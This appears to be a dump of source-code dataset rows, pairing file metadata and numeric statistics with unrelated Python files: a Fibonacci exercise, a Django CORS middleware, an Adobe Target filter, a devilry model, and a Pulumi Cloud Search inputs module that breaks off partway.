to_return += "\n" + "-" * 10 + "\n"
return to_return
def parse_inference(output):
end_index = output.find("=" * 10)
if end_index != -1:
return output[end_index]
end_index = output.find("-" * 10)
if end_index != -1:
return output[end_index]
return output
| 41.913043 | 269 | 0.6639 | 273 | 1,928 | 4.582418 | 0.527473 | 0.070344 | 0.031974 | 0.038369 | 0.153477 | 0.134293 | 0.081535 | 0.081535 | 0.081535 | 0.081535 | 0 | 0.016982 | 0.205913 | 1,928 | 45 | 270 | 42.844444 | 0.798824 | 0.007261 | 0 | 0.307692 | 0 | 0.102564 | 0.627092 | 0 | 0.051282 | 0 | 0 | 0.022222 | 0 | 1 | 0.051282 | false | 0 | 0 | 0 | 0.153846 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
1aa27bde9bc49424ded543bbec234b99e8e981c0 | 612 | py | Python | 1_beginner/chapter5/practice/fibonnaci.py | code4tomorrow/Python | 035b6f5d8fd635a16caaff78bcd3f582663dadc3 | [
"MIT"
] | 4 | 2021-03-01T00:32:45.000Z | 2021-05-21T22:01:52.000Z | 1_beginner/chapter5/practice/fibonnaci.py | code4tomorrow/Python | 035b6f5d8fd635a16caaff78bcd3f582663dadc3 | [
"MIT"
] | 29 | 2020-09-12T22:56:04.000Z | 2021-09-25T17:08:42.000Z | 1_beginner/chapter5/practice/fibonnaci.py | code4tomorrow/Python | 035b6f5d8fd635a16caaff78bcd3f582663dadc3 | [
"MIT"
] | 7 | 2021-02-25T01:50:55.000Z | 2022-02-28T00:00:42.000Z | """ CHALLENGE PROBLEM!! NOT FOR THE FAINT OF HEART!
The Fibonacci numbers, discovered by Leonardo di Fibonacci,
is a sequence of numbers that often shows up in mathematics and,
interestingly, nature. The sequence goes as such:
1,1,2,3,5,8,13,21,34,55,...
where the sequence starts with 1 and 1, and then each number is the sum of the
previous 2. For example, 8 comes after 5 because 5+3 = 8, and 55 comes after 34
because 34+21 = 55.
The challenge is to use a for loop (not recursion, if you know what that is),
to find the 100th Fibonnaci number.
"""
# write code here
# Can you do it with a while loop?
| 29.142857 | 79 | 0.73366 | 116 | 612 | 3.87069 | 0.586207 | 0.048998 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.07085 | 0.19281 | 612 | 20 | 80 | 30.6 | 0.838057 | 0.97549 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
1abd7c515172b6d604dfe87c1aded58ad1b6e3ac | 492 | py | Python | src/main/python/smv/__init__.py | shuangshuangwang/SMV | 021faece3f0fefca6051df8415789b14bc9a60ed | [
"Apache-2.0"
] | null | null | null | src/main/python/smv/__init__.py | shuangshuangwang/SMV | 021faece3f0fefca6051df8415789b14bc9a60ed | [
"Apache-2.0"
] | null | null | null | src/main/python/smv/__init__.py | shuangshuangwang/SMV | 021faece3f0fefca6051df8415789b14bc9a60ed | [
"Apache-2.0"
] | null | null | null | # flake8: noqa
# Smv DataSet Framework
from smv.smvdataset import *
from smv.smvinput import *
from smv.smvapp import SmvApp
from smv.runconfig import SmvRunConfig
from smv.csv_attributes import CsvAttributes
from smv.helpers import SmvGroupedData
from smv.historical_validators import SmvHistoricalValidator, SmvHistoricalValidators
# keep old py names for backwards compatibility
SmvPyCsvFile = SmvCsvFile
SmvPyModule = SmvModule
SmvPyOutput = SmvOutput
SmvPyModuleLink = SmvModuleLink
| 25.894737 | 85 | 0.841463 | 56 | 492 | 7.357143 | 0.642857 | 0.118932 | 0.063107 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002315 | 0.121951 | 492 | 18 | 86 | 27.333333 | 0.951389 | 0.162602 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.636364 | 0 | 0.636364 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
1abf7a7b43b01f4c19f97b7dac03bed2d51e14f1 | 578 | py | Python | api/middlewares/cors.py | lndba/apasa_backend | e0bb96e22a22f6e2a5a2826f225388113473e7e2 | [
"Apache-2.0"
] | 1 | 2019-08-06T07:31:40.000Z | 2019-08-06T07:31:40.000Z | api/middlewares/cors.py | lndba/apasa_backend | e0bb96e22a22f6e2a5a2826f225388113473e7e2 | [
"Apache-2.0"
] | null | null | null | api/middlewares/cors.py | lndba/apasa_backend | e0bb96e22a22f6e2a5a2826f225388113473e7e2 | [
"Apache-2.0"
] | null | null | null | from django.utils.deprecation import MiddlewareMixin
from django.conf import settings
class Cors(MiddlewareMixin):
def process_response(self, request, response):
response['Access-Control-Allow-Origin'] = ','.join(settings.CORS_ORIGIN_LIST)
if request.method == 'OPTIONS':
response['Access-Control-Allow-Methods'] = ','.join(settings.CORS_METHOD_LIST)
response['Access-Control-Allow-Headers'] = ','.join(settings.CORS_HEADER_LIST)
response['Access-Control-Allow-Credentials'] = 'true'
return response | 44.461538 | 91 | 0.685121 | 62 | 578 | 6.274194 | 0.483871 | 0.143959 | 0.215938 | 0.267352 | 0.154242 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.190311 | 578 | 13 | 92 | 44.461538 | 0.831197 | 0 | 0 | 0 | 0 | 0 | 0.227513 | 0.202822 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.2 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
1ac640bde4922315bdde8d12b4c3d89647d4b369 | 1,204 | py | Python | target_decisioning_engine/filters.py | adobe/target-python-sdk | f3e9b1bb6c8e1984e3d758ab1fe1a71225ade13e | [
"Apache-2.0"
] | 3 | 2021-05-25T20:10:46.000Z | 2021-06-15T05:49:18.000Z | target_decisioning_engine/filters.py | adobe/target-python-sdk | f3e9b1bb6c8e1984e3d758ab1fe1a71225ade13e | [
"Apache-2.0"
] | 15 | 2021-01-13T22:53:25.000Z | 2021-09-03T23:11:25.000Z | target_decisioning_engine/filters.py | adobe/target-python-sdk | f3e9b1bb6c8e1984e3d758ab1fe1a71225ade13e | [
"Apache-2.0"
] | 4 | 2021-01-04T18:44:01.000Z | 2022-03-15T21:30:11.000Z | # Copyright 2021 Adobe. All rights reserved.
# This file is licensed to you under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License. You may obtain a copy
# of the License at http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software distributed under
# the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR REPRESENTATIONS
# OF ANY KIND, either express or implied. See the License for the specific language
# governing permissions and limitations under the License.
"""filters"""
from target_tools.utils import is_empty
def by_property_token(property_token):
"""
:param property_token: (str) property token, required
:return: (callable) Returns filter predicate
"""
def _filter(rule):
"""
:param rule: (target_decisioning_engine.types.decisioning_artifact.Rule) rule
:return: (bool)
"""
property_tokens = rule.get("propertyTokens", [])
return is_empty(property_tokens) if not property_token else \
(is_empty(property_tokens) or property_token in property_tokens)
return _filter
| 38.83871 | 88 | 0.725914 | 165 | 1,204 | 5.181818 | 0.563636 | 0.070175 | 0.030409 | 0.037427 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008256 | 0.195183 | 1,204 | 30 | 89 | 40.133333 | 0.874097 | 0.653654 | 0 | 0 | 0 | 0 | 0.039548 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.285714 | false | 0 | 0.142857 | 0 | 0.714286 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
46e03e67100272373dbf1ee88d5d16ecb5dcbff8 | 337 | py | Python | devilry/devilry_dbcache/devilry_dbcache_testapp/models.py | aless80/devilry-django | 416c262e75170d5662542f15e2d7fecf5ab84730 | [
"BSD-3-Clause"
] | 29 | 2015-01-18T22:56:23.000Z | 2020-11-10T21:28:27.000Z | devilry/devilry_dbcache/devilry_dbcache_testapp/models.py | aless80/devilry-django | 416c262e75170d5662542f15e2d7fecf5ab84730 | [
"BSD-3-Clause"
] | 786 | 2015-01-06T16:10:18.000Z | 2022-03-16T11:10:50.000Z | devilry/devilry_dbcache/devilry_dbcache_testapp/models.py | aless80/devilry-django | 416c262e75170d5662542f15e2d7fecf5ab84730 | [
"BSD-3-Clause"
] | 15 | 2015-04-06T06:18:43.000Z | 2021-02-24T12:28:30.000Z | from django.db import models
from devilry.devilry_dbcache.bulk_create_queryset_mixin import BulkCreateQuerySetMixin
class PersonQuerySet(models.QuerySet, BulkCreateQuerySetMixin):
pass
class Person(models.Model):
objects = PersonQuerySet.as_manager()
name = models.TextField()
age = models.IntegerField(default=20)
| 22.466667 | 86 | 0.792285 | 37 | 337 | 7.081081 | 0.702703 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006849 | 0.133531 | 337 | 14 | 87 | 24.071429 | 0.890411 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.125 | 0.25 | 0 | 0.875 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 2 |
46e068f2889b5047e1c0fa0277cf1e07cf95b860 | 34,375 | py | Python | sdk/python/pulumi_google_native/cloudsearch/v1/_inputs.py | AaronFriel/pulumi-google-native | 75d1cda425e33d4610348972cd70bddf35f1770d | [
"Apache-2.0"
] | 44 | 2021-04-18T23:00:48.000Z | 2022-02-14T17:43:15.000Z | sdk/python/pulumi_google_native/cloudsearch/v1/_inputs.py | AaronFriel/pulumi-google-native | 75d1cda425e33d4610348972cd70bddf35f1770d | [
"Apache-2.0"
] | 354 | 2021-04-16T16:48:39.000Z | 2022-03-31T17:16:39.000Z | sdk/python/pulumi_google_native/cloudsearch/v1/_inputs.py | AaronFriel/pulumi-google-native | 75d1cda425e33d4610348972cd70bddf35f1770d | [
"Apache-2.0"
] | 8 | 2021-04-24T17:46:51.000Z | 2022-01-05T10:40:21.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from ._enums import *
__all__ = [
'CompositeFilterArgs',
'DataSourceRestrictionArgs',
'DateArgs',
'FacetOptionsArgs',
'FilterOptionsArgs',
'FilterArgs',
'GSuitePrincipalArgs',
'QueryInterpretationConfigArgs',
'ScoringConfigArgs',
'SortOptionsArgs',
'SourceConfigArgs',
'SourceCrowdingConfigArgs',
'SourceScoringConfigArgs',
'SourceArgs',
'ValueFilterArgs',
'ValueArgs',
]
@pulumi.input_type
class CompositeFilterArgs:
def __init__(__self__, *,
logic_operator: Optional[pulumi.Input['CompositeFilterLogicOperator']] = None,
sub_filters: Optional[pulumi.Input[Sequence[pulumi.Input['FilterArgs']]]] = None):
"""
:param pulumi.Input['CompositeFilterLogicOperator'] logic_operator: The logic operator of the sub filter.
:param pulumi.Input[Sequence[pulumi.Input['FilterArgs']]] sub_filters: Sub filters.
"""
if logic_operator is not None:
pulumi.set(__self__, "logic_operator", logic_operator)
if sub_filters is not None:
pulumi.set(__self__, "sub_filters", sub_filters)
@property
@pulumi.getter(name="logicOperator")
def logic_operator(self) -> Optional[pulumi.Input['CompositeFilterLogicOperator']]:
"""
The logic operator of the sub filter.
"""
return pulumi.get(self, "logic_operator")
@logic_operator.setter
def logic_operator(self, value: Optional[pulumi.Input['CompositeFilterLogicOperator']]):
pulumi.set(self, "logic_operator", value)
@property
@pulumi.getter(name="subFilters")
def sub_filters(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['FilterArgs']]]]:
"""
Sub filters.
"""
return pulumi.get(self, "sub_filters")
@sub_filters.setter
def sub_filters(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['FilterArgs']]]]):
pulumi.set(self, "sub_filters", value)
@pulumi.input_type
class DataSourceRestrictionArgs:
def __init__(__self__, *,
filter_options: Optional[pulumi.Input[Sequence[pulumi.Input['FilterOptionsArgs']]]] = None,
source: Optional[pulumi.Input['SourceArgs']] = None):
"""
Restriction on Datasource.
:param pulumi.Input[Sequence[pulumi.Input['FilterOptionsArgs']]] filter_options: Filter options restricting the results. If multiple filters are present, they are grouped by object type before joining. Filters with the same object type are joined conjunctively, then the resulting expressions are joined disjunctively. The maximum number of elements is 20. NOTE: Suggest API supports only few filters at the moment: "objecttype", "type" and "mimetype". For now, schema specific filters cannot be used to filter suggestions.
:param pulumi.Input['SourceArgs'] source: The source of restriction.
"""
if filter_options is not None:
pulumi.set(__self__, "filter_options", filter_options)
if source is not None:
pulumi.set(__self__, "source", source)
@property
@pulumi.getter(name="filterOptions")
def filter_options(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['FilterOptionsArgs']]]]:
"""
Filter options restricting the results. If multiple filters are present, they are grouped by object type before joining. Filters with the same object type are joined conjunctively, then the resulting expressions are joined disjunctively. The maximum number of elements is 20. NOTE: Suggest API supports only few filters at the moment: "objecttype", "type" and "mimetype". For now, schema specific filters cannot be used to filter suggestions.
"""
return pulumi.get(self, "filter_options")
@filter_options.setter
def filter_options(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['FilterOptionsArgs']]]]):
pulumi.set(self, "filter_options", value)
@property
@pulumi.getter
def source(self) -> Optional[pulumi.Input['SourceArgs']]:
"""
The source of restriction.
"""
return pulumi.get(self, "source")
@source.setter
def source(self, value: Optional[pulumi.Input['SourceArgs']]):
pulumi.set(self, "source", value)
@pulumi.input_type
class DateArgs:
def __init__(__self__, *,
day: Optional[pulumi.Input[int]] = None,
month: Optional[pulumi.Input[int]] = None,
year: Optional[pulumi.Input[int]] = None):
"""
Represents a whole calendar date, for example a date of birth. The time of day and time zone are either specified elsewhere or are not significant. The date is relative to the [Proleptic Gregorian Calendar](https://en.wikipedia.org/wiki/Proleptic_Gregorian_calendar). The date must be a valid calendar date between the year 1 and 9999.
:param pulumi.Input[int] day: Day of month. Must be from 1 to 31 and valid for the year and month.
:param pulumi.Input[int] month: Month of date. Must be from 1 to 12.
:param pulumi.Input[int] year: Year of date. Must be from 1 to 9999.
"""
if day is not None:
pulumi.set(__self__, "day", day)
if month is not None:
pulumi.set(__self__, "month", month)
if year is not None:
pulumi.set(__self__, "year", year)
@property
@pulumi.getter
def day(self) -> Optional[pulumi.Input[int]]:
"""
Day of month. Must be from 1 to 31 and valid for the year and month.
"""
return pulumi.get(self, "day")
@day.setter
def day(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "day", value)
@property
@pulumi.getter
def month(self) -> Optional[pulumi.Input[int]]:
"""
Month of date. Must be from 1 to 12.
"""
return pulumi.get(self, "month")
@month.setter
def month(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "month", value)
@property
@pulumi.getter
def year(self) -> Optional[pulumi.Input[int]]:
"""
Year of date. Must be from 1 to 9999.
"""
return pulumi.get(self, "year")
@year.setter
def year(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "year", value)
@pulumi.input_type
class FacetOptionsArgs:
def __init__(__self__, *,
num_facet_buckets: Optional[pulumi.Input[int]] = None,
object_type: Optional[pulumi.Input[str]] = None,
operator_name: Optional[pulumi.Input[str]] = None,
source_name: Optional[pulumi.Input[str]] = None):
"""
Specifies operators to return facet results for. There will be one FacetResult for every source_name/object_type/operator_name combination.
:param pulumi.Input[int] num_facet_buckets: Maximum number of facet buckets that should be returned for this facet. Defaults to 10. Maximum value is 100.
:param pulumi.Input[str] object_type: If object_type is set, only those objects of that type will be used to compute facets. If empty, then all objects will be used to compute facets.
:param pulumi.Input[str] operator_name: Name of the operator chosen for faceting. @see cloudsearch.SchemaPropertyOptions
:param pulumi.Input[str] source_name: Source name to facet on. Format: datasources/{source_id} If empty, all data sources will be used.
"""
if num_facet_buckets is not None:
pulumi.set(__self__, "num_facet_buckets", num_facet_buckets)
if object_type is not None:
pulumi.set(__self__, "object_type", object_type)
if operator_name is not None:
pulumi.set(__self__, "operator_name", operator_name)
if source_name is not None:
pulumi.set(__self__, "source_name", source_name)
@property
@pulumi.getter(name="numFacetBuckets")
def num_facet_buckets(self) -> Optional[pulumi.Input[int]]:
"""
Maximum number of facet buckets that should be returned for this facet. Defaults to 10. Maximum value is 100.
"""
return pulumi.get(self, "num_facet_buckets")
@num_facet_buckets.setter
def num_facet_buckets(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "num_facet_buckets", value)
@property
@pulumi.getter(name="objectType")
def object_type(self) -> Optional[pulumi.Input[str]]:
"""
If object_type is set, only those objects of that type will be used to compute facets. If empty, then all objects will be used to compute facets.
"""
return pulumi.get(self, "object_type")
@object_type.setter
def object_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "object_type", value)
@property
@pulumi.getter(name="operatorName")
def operator_name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the operator chosen for faceting. @see cloudsearch.SchemaPropertyOptions
"""
return pulumi.get(self, "operator_name")
@operator_name.setter
def operator_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "operator_name", value)
@property
@pulumi.getter(name="sourceName")
def source_name(self) -> Optional[pulumi.Input[str]]:
"""
Source name to facet on. Format: datasources/{source_id} If empty, all data sources will be used.
"""
return pulumi.get(self, "source_name")
@source_name.setter
def source_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "source_name", value)
@pulumi.input_type
class FilterOptionsArgs:
def __init__(__self__, *,
filter: Optional[pulumi.Input['FilterArgs']] = None,
object_type: Optional[pulumi.Input[str]] = None):
"""
Filter options to be applied on query.
:param pulumi.Input['FilterArgs'] filter: Generic filter to restrict the search, such as `lang:en`, `site:xyz`.
:param pulumi.Input[str] object_type: If object_type is set, only objects of that type are returned. This should correspond to the name of the object that was registered within the definition of schema. The maximum length is 256 characters.
"""
if filter is not None:
pulumi.set(__self__, "filter", filter)
if object_type is not None:
pulumi.set(__self__, "object_type", object_type)
@property
@pulumi.getter
def filter(self) -> Optional[pulumi.Input['FilterArgs']]:
"""
Generic filter to restrict the search, such as `lang:en`, `site:xyz`.
"""
return pulumi.get(self, "filter")
@filter.setter
def filter(self, value: Optional[pulumi.Input['FilterArgs']]):
pulumi.set(self, "filter", value)
@property
@pulumi.getter(name="objectType")
def object_type(self) -> Optional[pulumi.Input[str]]:
"""
If object_type is set, only objects of that type are returned. This should correspond to the name of the object that was registered within the definition of schema. The maximum length is 256 characters.
"""
return pulumi.get(self, "object_type")
@object_type.setter
def object_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "object_type", value)
@pulumi.input_type
class FilterArgs:
def __init__(__self__, *,
composite_filter: Optional[pulumi.Input['CompositeFilterArgs']] = None,
value_filter: Optional[pulumi.Input['ValueFilterArgs']] = None):
"""
A generic way of expressing filters in a query, which supports two approaches: **1. Setting a ValueFilter.** The name must match an operator_name defined in the schema for your data source. **2. Setting a CompositeFilter.** The filters are evaluated using the logical operator. The top-level operators can only be either an AND or a NOT. AND can appear only at the top-most level. OR can appear only under a top-level AND.
"""
if composite_filter is not None:
pulumi.set(__self__, "composite_filter", composite_filter)
if value_filter is not None:
pulumi.set(__self__, "value_filter", value_filter)
@property
@pulumi.getter(name="compositeFilter")
def composite_filter(self) -> Optional[pulumi.Input['CompositeFilterArgs']]:
return pulumi.get(self, "composite_filter")
@composite_filter.setter
def composite_filter(self, value: Optional[pulumi.Input['CompositeFilterArgs']]):
pulumi.set(self, "composite_filter", value)
@property
@pulumi.getter(name="valueFilter")
def value_filter(self) -> Optional[pulumi.Input['ValueFilterArgs']]:
return pulumi.get(self, "value_filter")
@value_filter.setter
def value_filter(self, value: Optional[pulumi.Input['ValueFilterArgs']]):
pulumi.set(self, "value_filter", value)
@pulumi.input_type
class GSuitePrincipalArgs:
def __init__(__self__, *,
gsuite_domain: Optional[pulumi.Input[bool]] = None,
gsuite_group_email: Optional[pulumi.Input[str]] = None,
gsuite_user_email: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[bool] gsuite_domain: This principal represents all users of the G Suite domain of the customer.
:param pulumi.Input[str] gsuite_group_email: This principal references a G Suite group account
:param pulumi.Input[str] gsuite_user_email: This principal references a G Suite user account
"""
if gsuite_domain is not None:
pulumi.set(__self__, "gsuite_domain", gsuite_domain)
if gsuite_group_email is not None:
pulumi.set(__self__, "gsuite_group_email", gsuite_group_email)
if gsuite_user_email is not None:
pulumi.set(__self__, "gsuite_user_email", gsuite_user_email)
@property
@pulumi.getter(name="gsuiteDomain")
def gsuite_domain(self) -> Optional[pulumi.Input[bool]]:
"""
This principal represents all users of the G Suite domain of the customer.
"""
return pulumi.get(self, "gsuite_domain")
@gsuite_domain.setter
def gsuite_domain(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "gsuite_domain", value)
@property
@pulumi.getter(name="gsuiteGroupEmail")
def gsuite_group_email(self) -> Optional[pulumi.Input[str]]:
"""
This principal references a G Suite group account
"""
return pulumi.get(self, "gsuite_group_email")
@gsuite_group_email.setter
def gsuite_group_email(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "gsuite_group_email", value)
@property
@pulumi.getter(name="gsuiteUserEmail")
def gsuite_user_email(self) -> Optional[pulumi.Input[str]]:
"""
This principal references a G Suite user account
"""
return pulumi.get(self, "gsuite_user_email")
@gsuite_user_email.setter
def gsuite_user_email(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "gsuite_user_email", value)
@pulumi.input_type
class QueryInterpretationConfigArgs:
def __init__(__self__, *,
force_disable_supplemental_results: Optional[pulumi.Input[bool]] = None,
force_verbatim_mode: Optional[pulumi.Input[bool]] = None):
"""
Default options to interpret user query.
:param pulumi.Input[bool] force_disable_supplemental_results: Set this flag to disable supplemental results retrieval, setting a flag here will not retrieve supplemental results for queries associated with a given search application. If this flag is set to True, it will take precedence over the option set at Query level. For the default value of False, query level flag will set the correct interpretation for supplemental results.
:param pulumi.Input[bool] force_verbatim_mode: Enable this flag to turn off all internal optimizations like natural language (NL) interpretation of queries, supplemental results retrieval, and usage of synonyms including custom ones. If this flag is set to True, it will take precedence over the option set at Query level. For the default value of False, query level flag will set the correct interpretation for verbatim mode.
"""
if force_disable_supplemental_results is not None:
pulumi.set(__self__, "force_disable_supplemental_results", force_disable_supplemental_results)
if force_verbatim_mode is not None:
pulumi.set(__self__, "force_verbatim_mode", force_verbatim_mode)
@property
@pulumi.getter(name="forceDisableSupplementalResults")
def force_disable_supplemental_results(self) -> Optional[pulumi.Input[bool]]:
"""
Set this flag to disable supplemental results retrieval, setting a flag here will not retrieve supplemental results for queries associated with a given search application. If this flag is set to True, it will take precedence over the option set at Query level. For the default value of False, query level flag will set the correct interpretation for supplemental results.
"""
return pulumi.get(self, "force_disable_supplemental_results")
@force_disable_supplemental_results.setter
def force_disable_supplemental_results(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "force_disable_supplemental_results", value)
@property
@pulumi.getter(name="forceVerbatimMode")
def force_verbatim_mode(self) -> Optional[pulumi.Input[bool]]:
"""
Enable this flag to turn off all internal optimizations like natural language (NL) interpretation of queries, supplemental results retrieval, and usage of synonyms including custom ones. If this flag is set to True, it will take precedence over the option set at Query level. For the default value of False, query level flag will set the correct interpretation for verbatim mode.
"""
return pulumi.get(self, "force_verbatim_mode")
@force_verbatim_mode.setter
def force_verbatim_mode(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "force_verbatim_mode", value)
@pulumi.input_type
class ScoringConfigArgs:
def __init__(__self__, *,
disable_freshness: Optional[pulumi.Input[bool]] = None,
disable_personalization: Optional[pulumi.Input[bool]] = None):
"""
Scoring configurations for a source while processing a Search or Suggest request.
:param pulumi.Input[bool] disable_freshness: Whether to use freshness as a ranking signal. By default, freshness is used as a ranking signal. Note that this setting is not available in the Admin UI.
:param pulumi.Input[bool] disable_personalization: Whether to personalize the results. By default, personal signals will be used to boost results.
"""
if disable_freshness is not None:
pulumi.set(__self__, "disable_freshness", disable_freshness)
if disable_personalization is not None:
pulumi.set(__self__, "disable_personalization", disable_personalization)
@property
@pulumi.getter(name="disableFreshness")
def disable_freshness(self) -> Optional[pulumi.Input[bool]]:
"""
Whether to use freshness as a ranking signal. By default, freshness is used as a ranking signal. Note that this setting is not available in the Admin UI.
"""
return pulumi.get(self, "disable_freshness")
@disable_freshness.setter
def disable_freshness(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "disable_freshness", value)
@property
@pulumi.getter(name="disablePersonalization")
def disable_personalization(self) -> Optional[pulumi.Input[bool]]:
"""
Whether to personalize the results. By default, personal signals will be used to boost results.
"""
return pulumi.get(self, "disable_personalization")
@disable_personalization.setter
def disable_personalization(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "disable_personalization", value)
@pulumi.input_type
class SortOptionsArgs:
def __init__(__self__, *,
operator_name: Optional[pulumi.Input[str]] = None,
sort_order: Optional[pulumi.Input['SortOptionsSortOrder']] = None):
"""
:param pulumi.Input[str] operator_name: Name of the operator corresponding to the field to sort on. The corresponding property must be marked as sortable.
:param pulumi.Input['SortOptionsSortOrder'] sort_order: Ascending is the default sort order
"""
if operator_name is not None:
pulumi.set(__self__, "operator_name", operator_name)
if sort_order is not None:
pulumi.set(__self__, "sort_order", sort_order)
@property
@pulumi.getter(name="operatorName")
def operator_name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the operator corresponding to the field to sort on. The corresponding property must be marked as sortable.
"""
return pulumi.get(self, "operator_name")
@operator_name.setter
def operator_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "operator_name", value)
@property
@pulumi.getter(name="sortOrder")
def sort_order(self) -> Optional[pulumi.Input['SortOptionsSortOrder']]:
"""
Ascending is the default sort order
"""
return pulumi.get(self, "sort_order")
@sort_order.setter
def sort_order(self, value: Optional[pulumi.Input['SortOptionsSortOrder']]):
pulumi.set(self, "sort_order", value)
@pulumi.input_type
class SourceConfigArgs:
def __init__(__self__, *,
crowding_config: Optional[pulumi.Input['SourceCrowdingConfigArgs']] = None,
scoring_config: Optional[pulumi.Input['SourceScoringConfigArgs']] = None,
source: Optional[pulumi.Input['SourceArgs']] = None):
"""
Configurations for a source while processing a Search or Suggest request.
:param pulumi.Input['SourceCrowdingConfigArgs'] crowding_config: The crowding configuration for the source.
:param pulumi.Input['SourceScoringConfigArgs'] scoring_config: The scoring configuration for the source.
:param pulumi.Input['SourceArgs'] source: The source for which this configuration is to be used.
"""
if crowding_config is not None:
pulumi.set(__self__, "crowding_config", crowding_config)
if scoring_config is not None:
pulumi.set(__self__, "scoring_config", scoring_config)
if source is not None:
pulumi.set(__self__, "source", source)
@property
@pulumi.getter(name="crowdingConfig")
def crowding_config(self) -> Optional[pulumi.Input['SourceCrowdingConfigArgs']]:
"""
The crowding configuration for the source.
"""
return pulumi.get(self, "crowding_config")
@crowding_config.setter
def crowding_config(self, value: Optional[pulumi.Input['SourceCrowdingConfigArgs']]):
pulumi.set(self, "crowding_config", value)
@property
@pulumi.getter(name="scoringConfig")
def scoring_config(self) -> Optional[pulumi.Input['SourceScoringConfigArgs']]:
"""
The scoring configuration for the source.
"""
return pulumi.get(self, "scoring_config")
@scoring_config.setter
def scoring_config(self, value: Optional[pulumi.Input['SourceScoringConfigArgs']]):
pulumi.set(self, "scoring_config", value)
@property
@pulumi.getter
def source(self) -> Optional[pulumi.Input['SourceArgs']]:
"""
The source for which this configuration is to be used.
"""
return pulumi.get(self, "source")
@source.setter
def source(self, value: Optional[pulumi.Input['SourceArgs']]):
pulumi.set(self, "source", value)
@pulumi.input_type
class SourceCrowdingConfigArgs:
def __init__(__self__, *,
num_results: Optional[pulumi.Input[int]] = None,
num_suggestions: Optional[pulumi.Input[int]] = None):
"""
Set search results crowding limits. Crowding is a situation in which multiple results from the same source or host "crowd out" other results, diminishing the quality of search for users. To foster better search quality and source diversity in search results, you can set a condition to reduce repetitive results by source.
:param pulumi.Input[int] num_results: Maximum number of results allowed from a datasource in a result page as long as results from other sources are not exhausted. Value specified must not be negative. A default value is used if this value is equal to 0. To disable crowding, set the value greater than 100.
